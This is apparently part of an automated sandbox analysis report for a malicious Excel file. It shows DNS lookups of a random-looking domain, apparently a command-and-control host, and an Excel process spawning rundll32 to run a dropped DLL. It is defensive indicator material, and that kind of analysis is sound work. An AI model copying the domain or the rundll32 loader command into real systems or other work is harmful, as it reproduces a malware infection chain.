                                                                                                                                                    Jun 11, 2021 12:11:45.437871933 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:46.574043989 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:46.627254009 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:47.437984943 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:47.730925083 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:47.780991077 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:48.407356977 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:48.441279888 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:48.479254961 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:48.501791000 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:49.502537966 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:51.502818108 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:52.879427910 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:52.937813997 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:54.097876072 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:54.150799990 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:55.407140970 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:55.457567930 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:00.201747894 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:00.266695023 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:03.599276066 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:03.667443037 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:21.630244017 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:21.690114975 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:32.376918077 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:32.450799942 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:44.240183115 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:44.299186945 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:12:52.319943905 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:12:52.383408070 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:13:22.504106998 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:13:22.573461056 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:13:24.518423080 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:13:24.581579924 CEST53606338.8.8.8192.168.2.3

                                                                                                                                                    ICMP Packets

                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                    Jun 11, 2021 12:11:48.479347944 CEST192.168.2.38.8.8.8cffa(Port unreachable)Destination Unreachable
                                                                                                                                                    Jun 11, 2021 12:11:49.502675056 CEST192.168.2.38.8.8.8cffa(Port unreachable)Destination Unreachable
                                                                                                                                                    Jun 11, 2021 12:11:51.522182941 CEST192.168.2.38.8.8.8cffa(Port unreachable)Destination Unreachable

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jun 11, 2021 12:11:43.356519938 CEST192.168.2.38.8.8.80xd0ceStandard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:44.393672943 CEST192.168.2.38.8.8.80xd0ceStandard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:45.437871933 CEST192.168.2.38.8.8.80xd0ceStandard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:47.437984943 CEST192.168.2.38.8.8.80xd0ceStandard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jun 11, 2021 12:11:48.407356977 CEST8.8.8.8192.168.2.30xd0ceServer failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:48.479254961 CEST8.8.8.8192.168.2.30xd0ceServer failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:49.502537966 CEST8.8.8.8192.168.2.30xd0ceServer failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Jun 11, 2021 12:11:51.502818108 CEST8.8.8.8192.168.2.30xd0ceServer failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:12:11:38
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x3e0000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:12:11:48
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\nxckew.wle,DllRegisterServer
                                                                                                                                                    Imagebase:0xef0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >